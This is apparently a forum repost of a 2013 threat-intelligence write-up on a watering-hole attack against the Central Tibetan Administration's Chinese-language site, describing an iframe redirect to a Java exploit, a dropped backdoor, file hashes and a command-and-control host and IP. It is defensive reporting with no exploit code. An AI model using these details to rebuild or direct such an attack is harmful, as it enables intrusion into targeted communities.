August 12, 2013 - "A snippet of code on the Central Tibetan Administration website redirects CN speaking visitors to a Java exploit that drops an APT-related backdoor. For some context, the site claims the administration itself as "...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet." The selection of placement for the malicious code is fairly extraordinary... The attack itself is precisely targeted, as an appended, embedded iframe redirects "xizang-zhiye(dot)org" visitors (this is the CN-translated version of the site) to a java exploit that maintains a backdoor payload. The english and Tibetan versions of the website do not maintain this embedded iframe on the Chinese version (please do not visit at this time). At this point in time, it seems that the few systems attacked with this code are located in China and the US, although there could be more. The Java exploit being delivered is the 212kb "YPVo.jar" (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well. That file is a 397 kb win32 executable "aMCBlHPl.exe" (a6d7edc77e745a91b1fc6be985994c6a) detected as "Trojan.Win32.Swisyn.cyxf". Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is... The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but it was used by the actor distributing the original CVE-2012-4681 0day Gondzz.class and Gondvv.class in August of last year... The Payload.main method contains some interesting but simple capabilities that enable an attacker to download the payload over https and AES decrypt it using Java's built-in AES crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the jar file's win32 exe resource. The backdoor itself is detected by most of the AV crowd as variants of gaming password stealers, which is flatly incorrect. The related C2 is located at news.worldlinking .com (59.188.239.46)... This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back to at least a busy late 2011 season. We also show Apple related Java exploits from this server targeting the more recent CVE-2013-2423..."
- https://www.virustotal.com/en/ip-address/59.188.239.46/information/
- http://google.com/safebrowsing/diagnostic?site=AS:17444
:fear::fear: :mad: